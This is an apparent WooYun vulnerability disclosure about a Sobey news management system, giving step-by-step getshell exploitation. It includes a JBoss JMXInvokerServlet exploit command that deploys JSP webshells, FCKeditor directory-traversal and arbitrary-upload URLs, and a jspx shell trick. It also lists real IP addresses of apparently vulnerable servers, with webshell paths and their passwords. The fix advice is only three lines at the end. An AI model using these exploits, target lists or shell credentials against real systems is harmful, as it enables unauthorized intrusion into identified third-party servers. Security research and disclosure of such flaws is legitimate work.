当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111231

漏洞标题:Sobey某新闻系统通用型漏洞打包

相关厂商:索贝数码科技股份有限公司

漏洞作者: 路人甲

提交时间:2015-05-08 18:52

修复时间:2015-06-22 18:54

公开时间:2015-06-22 18:54

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

任意文件上传+文件遍历

详细说明:

成都索贝数码科技股份有限公司,成立于1997年,由1988年成立的成都科大时达电子研究所(CKD)和1993年成立的深圳索贝科技有限公司合并重组而成。公司注册资本8000万元,是国内广播电视行业规模最大的软件开发及系统集成的领军企业,是国内首屈一指的、能够提供总体解决方案专业设计和咨询的服务商。
在多次刷洞的过程中都遇到了该厂商的新闻管理系统,这次把问题一起提出,希望能够通过
1#任意文件上传(方式1)
问题原因jboss未正常配置,导致可通过http://*/invoker/JMXInvokerServlet等方式getshell,jboss的getshell方法很多,而该套新闻系统均采用jboss作为中间件,导致了问题的产生
以http://113.200.74.240:8080/news为例

http://113.200.74.240:8080/invoker/JMXInvokerServlet


QQ截图20150430101428.jpg


小马地址:http://113.200.74.240:8080/myname/woo.jsp
一句话:http://113.200.74.240:8080/myname/wooyun.jsp
密码:woo0yun

QQ截图20150430101533.jpg


拿shell过程简单
再提供以下几个案例复现jboss上传

java -jar jboss_exploit_fat.jar -i http://*/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war woo .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean


http://113.200.74.236:8080/news/
http://113.200.74.236:8080/invoker/JMXInvokerServlet

QQ截图20150430102211.jpg


http://113.200.74.236:8080/myname/woo.jsp

QQ截图20150430102243.jpg


http://113.200.74.231:8080/news/
http://113.200.74.231:8080/invoker/JMXInvokerServlet

QQ截图20150430103548.jpg


QQ截图20150430103607.jpg


http://113.142.30.83:8080/news/
http://113.142.30.83:8080/invoker/JMXInvokerServlet

QQ截图20150430103710.jpg


http://113.142.30.83:8080/myname/woo.jsp

QQ截图20150430103737.jpg


等等,有些系统的shell要用不同的姿势拿,本文这里不对jboss拿shell的方法过多的评论

漏洞证明:

2#文件遍历,可以算是全版本
问题原因:fck编辑器

http://*/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../


http://113.200.74.169:8080/news/
http://113.200.74.169:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../


QQ截图20150430104449.jpg


http://113.200.74.240:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.200.74.236:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.200.74.231:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.142.30.83:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.200.74.146:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
因为操作简单,所以不一一截图了
3#任意文件上传
问题原因,fck编辑器未正确配置,完全未进行任何配置,但有一点要注意,上传的文件夹不在站点的路径下,所以我们要跨文件夹上传
http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

http://*/news/widgets/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://*/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector


QQ截图20150430104923.jpg


比如我这个站,

CurrentFolder=../jboss-4.0.5.GA/server/default/deploy/infoshare-news.war


我在根目录下传了wooyun.jsp,访问后会跳转,放弃
wooyun.jspx显示报了个错
wooyun.jspf勉强显示文本

QQ截图20150430111139.jpg


最后发现传jspx马还是可以连接的
一句话:http://113.142.30.17:8080/news/wooyun1.jspx
密码:0t2t3

QQ截图20150430112220.jpg


QQ截图20150430112256.jpg


该一句话已删除
简而言之,结合fck遍历找到站点路径跨目录传jspx,shell即可,抓包后可得到poc,即下面的测试代码
以下案例供重现
http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

http://113.200.74.169:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://113.200.74.169:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
http://113.200.74.240:8080/news/
http://113.200.74.236:8080/news/
http://113.200.74.231:8080/news/
http://113.142.30.83:8080/news/
http://113.200.74.146:8080/news/


其实直接套用poc就好,如果重新抓包,记得把参数Type值放空,否则会上传失败

修复方案:

正确配置jboss
fck上传点过滤
正确配置fck编辑器

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝